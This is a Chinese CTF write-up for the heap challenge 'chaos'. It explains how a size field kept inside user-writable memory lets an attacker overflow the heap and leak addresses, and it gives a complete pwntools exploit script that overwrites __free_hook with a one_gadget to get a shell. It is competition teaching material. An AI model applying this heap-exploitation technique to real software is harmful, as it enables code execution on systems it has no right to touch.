天翼杯

我是废物!!!!(超大声)

chaos

逆向分析,看exit code来判断哪一步没有通过检测就可以得到正确的菜单选择指令

这个题的漏洞在于如下代码

 v4 = qword_202050;                 /* save the current value of the global pointer */
qword_202050 = (__int64)buf;        /* the global now points at the freshly created buffer */
buf[65] = v4;                       /* previous pointer is stored *inside* the user buffer, at 65*8 = 0x208
                                       (the writeup reads this as a circular-list style link) */
*((_DWORD *)buf + 128) = v2;        /* v2 is described in the writeup as the size field; note the _DWORD
                                       index 128 is byte offset 128*4 = 0x200, also inside the buffer --
                                       so bookkeeping data lives in memory the user can write to */

size 字段存放在 buf+128 的地方，这里就出现了大问题。

如果一个堆块的大小可以覆盖到 buf+128 的地方，并且修改其 size，那么就可以无限输入了，直接造成堆溢出。

还有个问题在于它的 show 用的是 puts。由上面的代码不难看出这是一个类似循环链表的结构，那么当我申请 chunk 大小为 0x208

(buf[65],一个元素大小为8,65*8=0x208)那么show的时候直接就会吐出来在heaparry上的那个堆的地址,同理泄露libc_base

exp

from pwn import *
from pwn import p64,u64,p32,u32,p8
#coding=utf-8  # NOTE: a coding declaration only takes effect on line 1 or 2 of the file (PEP 263); here it is inert
context.arch = 'amd64'  # target is an x86-64 binary
#context.log_level = 'debug'

# elf = ELF('./chall')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# libc = ELF('')

io = process('./chos')  # local run of the challenge binary; the remote target line below is commented out
#io = remote("8.134.37.86",28542)
# The system libc is loaded for symbol lookup (libc.sym['__free_hook'] is read later in the script);
# the hard-coded address differences further down assume the author's particular libc build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def create(size, content):
    """Drive the program's 'create' menu entry.

    Sends the password/opcode line, then the requested size as a decimal
    string, then the raw content bytes (no trailing newline).
    """
    menu_line = b'passwd:Cr4at3 \nopcode:1\n'
    sendline_after = io.sendlineafter
    sendline_after('>>', menu_line)
    sendline_after('>>>', str(size))
    io.sendafter('>>>', content)

def delete(idx):
    """Drive the program's 'delete' menu entry for buffer index ``idx``."""
    menu_line = b'passwd:D3l4te \nopcode:4\n'
    for prompt, payload in (('>>', menu_line), ('>>>', str(idx))):
        io.sendlineafter(prompt, payload)

def edit(idx, content):
    """Drive the program's 'edit' menu entry.

    Selects buffer ``idx`` and then sends ``content`` as-is (no newline
    appended), so the caller controls the exact byte count written.
    """
    menu_line = b'passwd:Ed1t \nopcode:3\n'
    sendline_after = io.sendlineafter
    sendline_after('>>', menu_line)
    sendline_after('>>>', str(idx))
    io.sendafter('>>>', content)

def show(idx):
    """Drive the program's 'show' menu entry for buffer index ``idx``.

    The program's reply is left in the socket for the caller to read.
    """
    menu_line = b'passwd:SH0w \nopcode:2\n'
    for prompt, payload in (('>>', menu_line), ('>>>', str(idx))):
        io.sendlineafter(prompt, payload)

def recv(junk):
    """Read up to and including the next 0x7f byte and unpack the last six bytes.

    The six bytes are zero-padded to eight and decoded with ``u64``; the
    value is logged and returned.  ``junk`` is accepted for call-site
    compatibility but is not used.
    """
    raw = io.recvuntil(b'\x7f')
    tail = raw[-6:]
    leak = u64(tail.ljust(8, b'\x00'))
    info('leak:', hex(leak))
    return leak
# --- exploit sequence. Python 2 script: the bare `print` statements below are not valid Python 3 ---

# One 0x108 buffer, then eleven 0x208 buffers. 0x208 = 65*8 is the offset of
# the in-buffer link field the writeup identifies (buf[65]).
create(0x108,'\n')
gdb.attach(io)  # debugger attach left in from the author's session; blocks until gdb connects
for i in range(11):
    create(0x208,b'a'*0x8)

# Fill buffer 0 with 0x208 non-NUL bytes, then show it. Per the writeup show()
# prints with puts, so the output runs on into the following 8-byte field;
# the next six bytes are read back as a heap address.
edit(0,'b'*0x208)
show(0)
io.recvuntil('b'*0x208)
heap_addr = u64(io.recv(6).ljust(8,'\x00'))
print "heap_addr:",hex(heap_addr)

# Free nine buffers at index 0, allocate 7 + 1 again, then show index 0.
# The six bytes following the 'a'*8 prefix are read as a libc pointer.
for i in range(9):
    delete(0)
#gdb.attach(io)
for i in range(7):
    create(0x208,b'a'*0x8)
for i in range(1):  # single-iteration loop, kept as written
    create(0x208,b'a'*0x8)
show(0)
io.recvuntil('a'*0x8)
leak_addr = u64(io.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
# The two literals are absolute addresses presumably copied from the author's
# debugging session, so this difference is specific to that libc build.
libc_base = leak_addr - (0x7ffff7dcdeb0-0x7ffff79e2000)
print "libc_base:",hex(libc_base)
free_hook = libc_base + libc.sym['__free_hook']
print "free_hook:",hex(free_hook)
onegadget = [0x4f3d5,0x4f432,0x10a41c]  # candidate offsets for the author's libc; index 1 is used below

# Rearrange the allocations (the trailing comments are the author's index
# bookkeeping), then write past buffer 0's 0x208 bytes -- the overflow the
# writeup describes. The constants in the payload come from the author's session.
create(0x208,'a'*8)#2
create(0x208,'a'*8)#1->2
create(0x208,'a'*8)#0->1
delete(2)
create(0x208,'a'*8)#2->0
edit(0,'c'*0x208)
delete(2)
edit(0,'c'*0x208+p64(heap_addr-0x9e0)+p64(0x220)+p64(0x221)+p64(free_hook)+p8(0x73))
gdb.attach(io)  # second debugger attach, also left in
create(0x208,b'\x00')
create(0x208,b'\x00')
edit(0,p64(libc_base+onegadget[1]))

delete(0)

io.interactive()